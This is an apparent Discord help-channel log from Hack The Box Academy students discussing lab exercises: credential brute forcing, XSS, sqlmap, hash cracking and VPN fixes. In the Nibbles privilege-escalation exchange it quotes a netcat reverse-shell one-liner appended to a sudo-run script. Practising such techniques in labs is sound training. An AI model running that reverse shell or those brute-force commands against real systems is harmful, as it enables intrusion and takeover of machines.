Uhm okay, attacking common services - medium lab, I've tried to brute force all services which were: ssh, sftp and 3 others which I didn't brute force. Basically brute force tools run for a ton of time and don't discover credentials with wordlists that do contain those credentials. I used hydra with the pws.list file for the password list and users.list (given in the resources of the module) for ssh, and Medusa with the same files as hydra, but didn't find anything, so I tried with rockyou and users.list and it's still running after more than 2 hours. Hydra for ssh has been running close to two hours
But it's not the first module that this happens, it happens a lot with all modules, it either works well immediately or sometimes it runs for hours on end and doesn't find anything or maybe it does but doesn't recognize the -f flag. Hydra is mostly like this, netexec and Medusa work better but happens with those too. The screenshot is of Medusa on sftp
sounds like you're doing something wrong then it won't take nearly that long to brute force. also how are you so sure they contain the user/password if you don't have the user/password?
I searched on the internet
could still be wrong info
the lists either don't contain the info, or you aren't using the right syntax, or maybe not even supposed to brute force at all. i'm not really sure since i didn't make notes for the medium lab.
Idk maybe but it's not the first time this happens, I remember like in the password attacks module the password was contained in the resources but it still didn't find it after running for so long
yeah password module takes the longest by far out of any, still less than 30 min
generally bruting is going to take ~5-10 mins max
Yea sometimes for that it ran like 2 hours and then either my laptop shut off or it didn't find anything
I think I remember the syntax
Hydra -u user.list -p password.list -h IP -f - vv
Idk I think it's something like that
I'm abt to sleep
yeah that's the wrong syntax for lists, may want to review
i just completed the section, you may want to enumerate more
I'm on the Web Archives section of the Information Gathering - Web Edition module and every time I try to look at the snapshot of hackthebox from Aug 8 2018 it redirects me to Feb 10 2020. I don't know what to do
working for me, try another browser?
It's not .com
That's your problem
Think about where HTB is based, it's a country code
Got it, thanks!
Utilize your 2 braincells competing for 10th place out of 8
dick
Proudly
If you wanna participate in the server, it takes 5 minutes at most
Tell me more
I tried
It looks like a gen chat... Else invite me to one
#Cicada3301
Hack the Box
LuLz
It allows me to chat... So now it's a gen chat...
That was so easy...
You don't make the rules... Eye do...
Watch out he's gonna take out his fedora!
No, HTB does
It's HTB server, so it's their rules, shrimple as
Pls move me to general
I don't understand your rules and how this works... So give me access to chat in general... Easy as that
So how far along are you by cracking the puzzle?
Liber Primus
Liber Primus can be found in lodge nmbr?
This takes forever...
Hack the box...
read and follow #welcome
any more off-topic chat will result in a mute
Bans, Censorship and Muting...
Maybe that's a Q...
Eye think it's funny... Hackers that can't hack the box...
Hi
Beginner here.
The module is XSS in the bug bounty path.
What we are learning is how to identify vulnerable parameters. I tried with xsstrike and found some reflections or payloads
They all basically start with ">, I understand that the tag is being closed first, as the parameter is in <img src= >
I'm just trying to understand how these or any payload works
When I input the payload in the field nothing happens, it just gets inserted as I can see in the page source
All these payloads have () in common, does it mean that i have to insert js code in parentheses?
For example if i want it to pop with 1,
Do i have to put
<script>alert(1)</script> in parentheses?
If not how do i execute it?
Again I'm a beginner and your help is much appreciated
Yes, it gets injected in the page source, the page interprets it as part of the source code rather than input.
The JS code doesn't go within (), it goes within the <script> tags.
Do i put the <script> tags after the payload?
Wdym?
Like append the payload with the tags
Sorry, but I'm not sure I follow. I don't understand what payload you're referring to?
Xsstrike gave me a payload declaration that a parameter is vulnerable
What does it mean?
Does it mean that only that payload would work?
Ah, I see. I'm a little rusty on XSS so bear with me if I'm wrong, but that payload should just be executed by itself. It just demonstrates that the input field is vulnerable, that's all. You can then go ahead and craft your own payload iirc.
No, I think the tool just identifies a vulnerable field for you.
So payload generation is just the sign that the parameter is vulnerable. That's all
Yeah, the tool basically identifies the vulnerable field and is like "Hey, this field is vulnerable to this type of XSS attack. Here's a sample payload:"
But HTB academy suggests me to input the js code "with" the payload
You can then craft a payload and perform an attack based of the type of XSS.
Yes, continue on with the module, they'll introduce attacks you can carry out further in the module.
I'm assuming you're in the part of the module where they're just introducing the types of XSS and automated XSS discovery.
The next part is XSS attacks.
That is correct
Just continue on, they'll slowly introduce the attacks to you. As long as you've understood the basics they've explained, you'll be fine with the attacks.
Thanks, it's just that they suggested to insert the payload along with the script
For now you can just stick with the basic alert command they taught you if you wanna test things out.
Basically payload is just a sign
Just a sign?
Yeah. Sign that this parameter is vulnerable
Go work with this parameter
Ah, yeah, you could say that.
Well, when i insert <script> tags, the page simply renders it
It doesn't get executed
Any idea?
Like it shows what I inserted on the page
Which section are you on and what exactly did you put in?
It's the phishing section
ServerIp/phishing
I input the payload, nothing happens. Just gets consumed by the image tag and i see it in page source. No pop up
I input the js code instead of the xsstrike payload. It just prints it on the web page
No execution
This section?
https://academy.hackthebox.com/module/103/section/984
Yes
What I really need to understand is how to execute alert() on this page. Xsstrike gave a payload. I know where it's inserted.
If you could just tell me how do i make it pop up with alert, it will be a huge help
And i would know everything i wanted to know about it for now
I think they provided a tip in the exercise, did you try looking at the source code after injecting a basic XSS payload to figure out how?
Yeah
It just gets printed on the screen
Well i think i should try harder, and come back
Thank you for time
Would it be okay if i add you?
As a discord friend
Sure
If you still can't get it, reply to my message here or DM me and I'll give you a nudge.
Cool thanks
Is anyone here who has completed the password attacks - easy skills assessment? I have a doubt, I solved it but I highly doubt it's the right approach
hi all, I'm Russian. Who can hack a website's databases?
I've solved it but it's been forever since I did
can you check your notes please?
I'll see if I have notes, but I don't think it's the "non-intended" way.
okk thankyou please do check once
Just checked my notes. I'll DM you what I did. Don't wanna include spoilers here, that ok?
yes sure please
That's what I did. Also, delete this message.
P.S. won't be DM'ing you now since we've confirmed we did it the same way
okkk thank you, that's fair
Is anybody able to help with Introduction to NoSQL Injection > Skill Assessment 2
What exactly is the problem?
I think I know how it's meant to be solved, but I'm having trouble injecting to the reset token form. Tried everything from the module. Need a hint
send me a dm with what you have tried
the File Inclusion: Automated Scanning question was solved by fuzzing page parameters in search of lone parameters, not linked to any form nor user selection, which is ?view=..
so the question is: how does such a case happen in a real life scenario? I can't think of a web application case where there is a URL based parameter that isn't linked to at least a user selection functionality or something..
does anyone know a web application case where it has such a feature?
I sit a lot at the academy, but last Friday I started doing boxes, so of course I started at the starting point and have now sat with it all weekend. Very fun, very educational. Perfect for interspersing what you read theoretically at the Academy with real exercises.
Hey could someone help me, I'm doing the attacking enterprise module and in the lateral movement & priv esc section I'm having trouble using crackmapexec with proxychains
I have an ssh connection to the internal machine
Any help?
I suggest setting up a port forward of some form instead so you can be less restricted
Miauwdy
Someone finished the SOC course on hack the box?
Don't ask to ask
Hey i cant seem to run crackmap exec here any help
I am having some issues with Introduction to Digital Forensics .
#Practical Digital Forensics Scenario
I think i just dont understand what the question is asking. Because i think i have found all there is to be found. But not a smoking gun kinda evidence on question 1
?
You are asking a question that you can answer yourself. But you don't want to know whether someone has completed the course. You want to know something else, right?
Yes, 843 people
thatsit, thanks
Use netexec
https://academy.hackthebox.com/module/113/section/2139 Although I modified the bat file to not delete the restart.exe, I have trouble finding it. The other 2 files are there though
Dear HTB team. Please update the academy modules to use nxc because all of the "just copy and paste" students are having difficulties
Ya I'm using it now but the commands
Netexec syntax is the same as cme
To list shares and all is different right
Here in crackmap it uses a module spider plus is that usable in netexec also
Same syntax
Oh cool it worked
use /feedback
They'll likely do a batch update
I got a json file but i cat it and its empty
Hey guys,
For a module I am required to use the sqlplus tool to connect to an oracle database, but it returns an error saying command not found.
I tried adding the path but the tool only exists in metasploit folders, nowhere else.
And even after adding it to the path the error is not solved
Help please
Did you reload your configuration after updating your path? The changes applied to things like .bashrc will not take effect immediately and will require a terminal restart.
I did
Did you follow the install script from the section?
I did
My bad
Sometimes the script breaks
Okay lemme give it a shot
Hey guys , I need some help in this question ( Web Requests ) pls
Use burp intruder to fuzz for .html files under the /admin directory to find a file containing the flag.
I just don't know which word list to use, I am using Kali vm.
Have you done this module/section ? https://academy.hackthebox.com/module/113/section/2139
Yes, it sucks
Thank you haha could you give me a hand with a problem of mine?
It's easier for someone to help if you provide the module/section/link etc.
I am stuck on Whitebox pentest module final assessment, question related to patching,
The Assessment requires me to submit code in a certain way.
I have sanitized and validated type and length variables inside generatePassword function.
Then I am stuck at this
Original Purpose failed message
Hey i got a sql express backup.ps1 file i used get command and it showed it got the file but cant find it anywhere on my pwn box
Hey guys , I need some help in this question ( Web Requests ) pls
Use burp intruder to fuzz for .html files under the /admin directory to find a file containing the flag.
I just don't know which word list to use, I am using Kali vm.
Web Requests/Web Fuzzer/ Burp intruder
Use a wordlist suggested by the example
https://academy.hackthebox.com/module/163/section/1543 Having trouble grasping why this is of any use to me, or whether it is the process of getting it that is actually useful
Banners may contain some additional info to sniff out
I just wanna say , the amount of knowledge , quality content of some modules , is impressive . Still working on bloodhound module . 31 different DACL misconfigurations/ attacks . Amazing
Can someone help me
Pls dm
No
Okay
Got the subdomains and the vhosts. But the FQDN? Isn't that what's common between all these? Like weather.bbc.com, report.bbc.com have FQDN bbc.com?
Google.com is the domain name, where www.google.com is the fqdn
Translate, maps, www, scholar; all subdomains, where translate.google.com is the fqdn and so on
Fqdn would be like the subdomains and vhosts
The x.whatever.tld
Are a.b.whatever.tld
A fully qualified domain name (FQDN), sometimes also called an absolute domain name, is a domain name that specifies its exact location in the tree hierarchy of the Domain Name System (DNS). It specifies all domain levels, including the top-level domain and the root zone. A fully qualified domain name is distinguished by its lack of ambiguity in...
Heyyy i am on Password Attacks - Med module
|| i ran a nmap scan and smb and ssh are open ||
but be it hydra or netexec or crackmapexec (which doesn't work now) nothing is working and I am stuck on the brute forcing section
Hey! Could someone help me pls, I'm having an issue with the web services exercise of the Login Brute Force module. But I'm pretty sure my command is good.
Here the host: ||deleted*|| and the command I use: ||deleted*|| (tried some other ports as well, same result)
can anyone please point me to a hint for what I am doing wrong?
what result are you getting ?
do this
i dont get why it doesn't work
you need to specify the port given
not one of the other ports, as this is a public IP:PORT
when HTB gives you a public_IP:PORT your ONLY scope is the given port
This give me this error, thats why i started looking around
||ERROR: Failed to match regex pattern within server's response.||
then that's an error with your search pattern, not with the port
idk i never used medusa
try ssh once it will be slower but work
never needed to
i did for the sake of this module so i remem
the exercise wants to get the ftp before the ssh :/
it wants creds of ftpuser
also please don't go back and delete your syntax
you need to brute force ssh session only
it's actually fairly annoying
real
That depends
Srry, think its was better to remove
no, I only hopped in here for a sec
no it is how it is in this question if i remem right we need to brute force ssh only
pwese it would take less than a min but if you are busy then ok
tbh it's been a minute for this section
..
try ssh
KISS; use the basic wordlists from the resources list
did it
the answer is revealed under smb
it just aint working at all like netexec says every pass is correct
and hydra aint running it against smb
hydra is honestly dumb against smb
real
but netexec should get it; genuinely don't see why it wouldn't
it legit says every pass is correct i am fairly stuck
try resetting the target or contacting support
@eternal vigil I was able to get creds with CME
also crackmap goes in with throwing 100 errors and then says first is correct which is not
CME and NXC are virtually the same
well 100 errors does not sound good LMAO
Yeah, I'm aware. I just happened to use CME way back then
normally cme aint working so i build it from its github and run the crackmapexec.py
makes sense
Were you there one who was having trouble with CME earlier too?
ikrr
Maybe just stick with netexec.
nope i just never use it netexec is OG
(same though)
yea but it just aint working at all
i just gotta spend the day catching back up on schoolwork that's all
got several chapters to "read" and answer questions on
@eternal vigil did you try that password?
and user?
You're on the right path from that screenshot I just saw @eternal vigil
Remove that.
your screenshot showed a different username
but the right password; if that's consolation
Yeah, the user was right, I used those creds according to my notes.
i believe if you do --shares at the end it might help determine false positives
but i could be wrong
yup and guess what it is the first user and pass on the lists and if i ask netexec not to stop it says everything is correct
that's why I say KISS
didnt work
Keep it simple silly
i mean i know the user i need to use and you told me the pass but i wanna know the correct way
i mean tbh i would have just checked it on the first crack and just gone "god dammit"
i did check it but didnt work
it's not the one you copied, the screenshot you had earlier showed a different username
https://academy.hackthebox.com/module/143/section/1509 The first question, how did wley's password come about?
It said that for me too, I just went with the first one and got lucky
uhhh ok maybe i am trying to establish a connection wrong then ig ?
Unfortunately I didn't save my command, for some reason, I sprayed that single password across all the users and got a bunch of positive in my notes.
ohhhh that makes sense
Netexec should work.
I don't remember why I chose that password to spray with though. However, in my notes, it seems like I only saved part of the output, so I must've tried multiple passwords. I must've used some flag to try one password at a time across all users before moving to the next one (unless it does that by default).
but it aint working its saying all passwords are correct
Maybe all passwords are correct, but not all have access to the share you need to proceed?
makes sense imma try that
yup thats what i was wondering
Can you DM your command and output?
who knows
Oh
I realized the issue
You're way overthinking it
If you figure out why multiple users are a success, please let me know the reason.
Vantas i can dm you i know what's going on
Oh, please do.
It's laughable simple
yea i tend to over complicate stuff sometimes
Often the correct answer is the most obvious
It's a very basic thing with SMB itself
did you actually try connecting to the SMB share with any of the "false positive" credentials? :)
I'd assumed he had so I hadn't even given the correct answer a second thought
i honestly never thought of it so I brushed it off so gotta update my arcane tome
i did but i was doing it wrong bro what, r1ckyr3c0n got me out of the slump, i do some super dumb mistakes ngl
if you want i can dm you the super secret that i discovered about it
yes please do
Are there any better ways for cracking a hash ?
In this module (IPMI footprinting in Pentester Path) , I retrieved the hash and am using hashcat to crack it.
It has an estimated duration of 6 days.
Please help
well it shouldn't take 6 days
it sounds like you're trying to use the rockyou.txt
instead of the provided footprinting wordlist
from the resources button
I should use that list here as well ?
yes
Alright let me try.
Thanks marcie
typically if you're given a wordlist for the module, you use it for the whole module
Yes alright.
Plz i need help
Az
This is not the place where you can get people to hack for you
it's ok
Ok
sqlmap -u 'http://SITE:PORT/case3.php' --cookie='id=2' why does it say there are no parameters found? I thought it would automatically identify id as an injectable?
id=*
I see. It sometimes can identify areas to inject automatically, when can I rely on sqlmap for it to be the case?
How do i make a wordlist containing words in small case, appear in upper case while bruteforcing with hashcat ?
just use cyberchef
Cyberchef is no help decoding IPMI hashes.
I am using Hashcat to crack this hash i obtained.
It is from the IPMI module in Footprinting Pentester Path.
The given wordlist is what I used and I couldn't crack it.
How do i do this ?
I converted the wordlist to uppercase and tried inputting that into hashcat but it still didn't work
Yes mate, thanks for that. I got uppercase within a sec
Ok. Then I am unsure if I can help anymore, best of luck
What about the t flag? This will toggle the case of all characters.
Toggling didn't help
I thought I couldn't get the hash because my wordlist is in lower case and the plaintext might be case sensitive.
But that wasn't it
Even with an uppercase list or mixed list
I couldn't crack the hash
In attacking common services medium lab there should be 6 open ports right? I ran nmap multiple times and I still only get 5
I'm having an issue with the skills assessment from information gathering, I am on question 3: What is the API key in the hidden admin directory that you have discovered on the target system?
I am trying to gobuster vhosts but I keep getting false positive results and I tried multiple wordlists
sometimes blackscreen is just screensaver, have you tried pressing enter on it?
did rdp work in other modules? you can try resetting the lab or using the pwnbox in browser that should have everything preinstalled
no results with the big list something is wrong
do you have the pwnbox powered up at the same time you're on the vpn?
yeah they use the same IP
you don't want to run them both at the same time, it'll cause connectivity issues like you described
someone pls help im going to lose my brain
I'm having an issue where RDP won't stay connected for more than 3 minutes via Windows using the VPN, requiring to shutdown and restart openvpn every time in order to reconnect. and the VPN connects from inside VM of Parrot, but unable to ping the target machine or RDP to it.
tho i can ping the targets gateway
Are you using the VPN and pwnbox at the same time?
nope
then what do you mean "the vpn connects from inside the vm of parrot"
i've been trying to avoid using the in-browser boxes because they're nearly unusable for me
sounds like you're using the vpn with parrot
im running parrot from VMWare
ok
try killing the vpn: sudo killall -9 openvpn, then terminate the target. re-download a fresh vpn file (tcp, and possibly try another region.) after that on the page where you spawn the target press CTRL+SHIFT+R, respawn the target, reconnect to the vpn, wait 3 mins and try again
no dice.
i can connect to VPN via windows though. but the RDP connection only stays live for about 3 minutes then i have to reset the vpn
there wasn't enough time for you to have done what i mentioned on both regions
that doesn't look like a target ip to me
thats its gateway
seems like something wrong with your vm then
you're on 10.10.15.x... and pinging 10.10.14.x
oh i see
yeah idk, something wrong with your vm maybe.
ok in that case shut down the VM, open an administrator command prompt in Windows and type netsh i i r r and then netsh winsock reset then reboot your computer and try again
i think it's something with your vpn file, it shouldn't ping the x.x.14.x if you're on x.x.15.x
make sure to follow all the instructions precisely, kill the vpn, delete your vpn file, regenerate a new tcp VPN file in a whole new region (do these steps after the previous windows commands i gave)
Any reason the RDPs on the AD module almost always show a black screen when trying to connect via xfreerdp using openvpn?
Press space bar?
??? it worked what, can you tell me why?
because the screen was asleep, you need to wake it up
Wild, thanks i appreciate it, was getting real frustrated it
heyy i hope everyone is doing fine, i have a question, do the modules opened with a student subscription get locked after the membership ends?
Yes, with the exception that if you finish the module entirely you get to keep it unlocked forever, even if they update it.
alr , thanks mate
I'm in "getting started nibbles privilege escalation", last question. When trying to run the monitor.sh file, I get 'unknown': I need something more specific. /home/nibbler/personal/stuff/monitor.sh: 26: /home/nibbler/personal/stuff/monitor.sh: [[: not found /home/nibbler/personal/stuff/monitor.sh: 36: /home/nibbler/personal/stuff/monitor.sh: [[: not found /home/nibbler/personal/stuff/monitor.sh: 43: /home/nibbler/personal/stuff/monitor.sh: [[: not found
looks to me like you're not running it correctly or the script has some problems
if you didn't touch the script it's probably not being ran correctly
I'm running: sudo /home/nibbler/personal/stuff/monitor.sh - or sudo bash /home/nibbler/personal/stuff/monitor.sh
I didn't alter the script, I just appended the reverse shell that is in the directions.
Or sometimes it asks me for a password.
well if you appended the shell you did modify it.. what was the command you used?
echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.197 8080 >/tmp/f' | tee -a monitor.sh
maybe look at the script on lines 26, 36, and 43 to see what it's doing
Just some if statements, but why would the module contain a broken script?
i don't think it does
i don't know the login details to go look myself
did you make a backup copy of the file like the section said
yes
maybe try restoring it and trying again
also did you have netcat listening just in case the shell actually worked anyway?
alright i just did it, works fine for me
i'm guessing you didn't create the file correctly, it's only a one-liner
what are the contents of monitor.sh?
You want to see the entire code of the file?
it should only be one line. the line you echo'd into it when you created it
so sounds like you didn't create it properly with the echo command
echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.197 8080 >/tmp/f' | tee -a monitor.sh
right, so the contents of monitor.sh is only that line you echo'd in right?
No, that line is just appended to the end, all the previous code is still there.
that's your problem
you don't need anything other than the code you echo'd in
so go into /home/nibbler/personal/stuff, then delete monitor.sh if there's something in there, create the file with that echo command you showed, chmod +x the file to make it executable, then run it with sudo
The module just talks about appending to the end of it
you could, but the script itself doesn't seem to be working. plus there's no file in there to append to.
The monitor.sh file is in there
Hi everyone, I am stuck in the FOOTPRINTING module, chapter SMTP. Question 2 asks: Enumerate the SMTP service even further and find the username that exists on the system. Submit it as the answer.
HINT: On systems usernames are often named after the employee's name. We recommend to use the Footprinting-wordlist provided as resource. Remember that some SMTP servers have higher response times.
Firstly, it never taught how to perform bruteforcing, secondly, I am not able to find the provided wordlist.
Can someone please help me out.
Thanks
There's a "Resources" link on the page near the upper right that contains resources that are part of the module, you'll find the list there.
welp nm, they don't mention that tool, but it's a built in tool with Kali
it's also mentioned in a couple other modules if you've done them, i think attacking common services
thanks, will give it a look now.
i am following the cpts module. and footprinting comes before the attacking common services module...
that is to check a single user, not in a brute force method.
did you do attacking common services? it's mentioned there
it does work to brute users based off a list, use the list in resources
not yet...
i am following the modules in order , CPTS
alright, well you can manually do it or search for a tool that does it
i checked hydra but it asks for password list while smtp server is connected via telnet and it never asks for a password....
Hi i want one game hacked can sb help
no, this discord is about the hackthebox platform, this channel specifically about the academy platform. they do have a module on game hacking though.
where
on the academy site
Can i hack monopoly go i want to hack that game so bad
Thank you but is it possible to hack monopoly go
is it 'possible'? Sure, anything is possible
but again, that's not what this discord is about
I understand
Thanks mate
https://academy.hackthebox.com/module/details/208 and https://academy.hackthebox.com/module/details/182 go over some basic game hacking stuff
But im no hacker
Okk
thanks, i just checked and found the provided wordlist but how do i upload it onto the provided workstation lab?
the pwnbox? easiest way would probably be to log into the hackthebox site on the pwnbox itself and just download it
thank you ❤️
@cloud urchin So that finally worked. Wow, they should update the instructions.
you could probably also just copy/paste the contents of the file into a new one
glad you got it working.
this one would be better. thanks
You can also right-click the link and use wget to download it
hey everyone, i am not able to rdp into a session given in Pass the ticket of the password attacks module, even though username, password and ip are all there. all it is doing is throwing errors, so i tried ssh too but naah, no luck there. might be a problem with the given target, i am not really sure, so asking here if it's me or the target?
can you ping it?
are you connected to the vpn?
also it says right there to RDP, why are you using ssh? try rdp
yesss i can ping, sorry i made a typo
i was only rdping but it ain't working so i thought why not try ssh
yes
show your rdp command
xfreerdp /v:10.129.96.144 /u:Administrator /p:AnotherC0mpl3xP4$$
the password contains some special characters which the os interprets a different way, try wrapping the password in single quotes 'like this'
oh yea, makes a lot of sense, my bad, thank you
Hello I'm stuck in AD skill assessment 1, question 6 Submit this user's cleartext password.
got the hash but can't crack it
still doesnt work
it's possible it can't be cracked and you must find it a different way
what's the command you gave and the error
Like what! I have been stuck on this for two days
well, think about credential hunting and maybe tools you can use to find creds.
Do u still need help?
Look through the sections and figure out what you can potentially do with an uncracked password hash
The question asks for the plaintext password, not pth
Ahhh okay
It could be that it is stored on the dc in plaintext and you need pth to get into the DC, but I admit that is a big stretch
yes
that password isn't a hash, it is in cleartext
I know, but I couldn't find anything!
did you try what i suggested?
probably shouldn't be giving direct answers for skill assessments
hmmm, i would say since he can get the hash then it is a tooling problem
the skill assessment question asks for the cleartext pass.. there's a way to find it. giving the answer away isn't good.
try to nudge in the correct direction..
its a skill issue
i mean if u are 1% away from the answer, the nudge is giving that last step
if u are stuck for days on it, spending more time isn't time efficient
esp if u r on the last step
giving away the answer isn't the right thing to do period
again, that isn't even the direct answer, u still need to see the same output, my suggestion was just a cleaner way
I tried to crack it and find several ways to find it, but I couldn't, that's why I came by
yep nothing wrong with that.. i nudged you in the right direction
IT WORKED NORMALLY RESPAWNING THE TARGET 
HOW IS PASSWORD ATTACKS 8 HOURS ONLYYY???? 
I don't know one single person for which it took 8 hours
Basically all modules take much longer than what's written, at least for me
You can just ignore the time that's listed, those are just estimates and it's going to be different for everyone for each module.
It really doesn't mean anything at all, what matters is absorbing the content and understanding it all.
real
Help me crack this hash someone !
I used hashcat john n what not
Can i paste the hash ?
From which module?
Did you use the wordlist from the module?
I did it with john
Read this Blog https://www.rapid7.com/blog/post/2013/07/02/a-penetration-testers-guide-to-ipmi/
Did you use the wordlist provided ?
Some of these modules are so frustrating, the Bleichenbacher & DROWN one seems like it's built just to waste time. Takes ages to run the attack and you can do other modules while it runs.
hi! got this for cybernet secure
have you solved this issue?
O yea i completed the module. You have to generate possible PINs and use those with the script so the AP doesn't lock. I think it still locked for me but i just left it if i remember correctly and the ap unlocked itself in a minute or so
Or something happened that the AP unlocked
Hey, that's why it is an optional exercise and not required to complete the module
It was not optional lol. it said it was but the options to continue did not exist. Think that is because I am on the enterprise subscription
There was no option to show the required key to decrypt the tls stream
I'm gonna check that internally. I'll get back to you
Thanks.
In the meantime I updated the question. You should be able to obtain the PMS in the hint now. Please let me know if this solved the issue
Based
hey guys I finished the intro to whitebox pentesting module, but am going back over it and something isn't making sense to me
in the http response injection part, I can't wrap my mind around why the single quote is enclosed in backticks
it causes the string to have an odd number of single quotes... excluding the one that gets commented out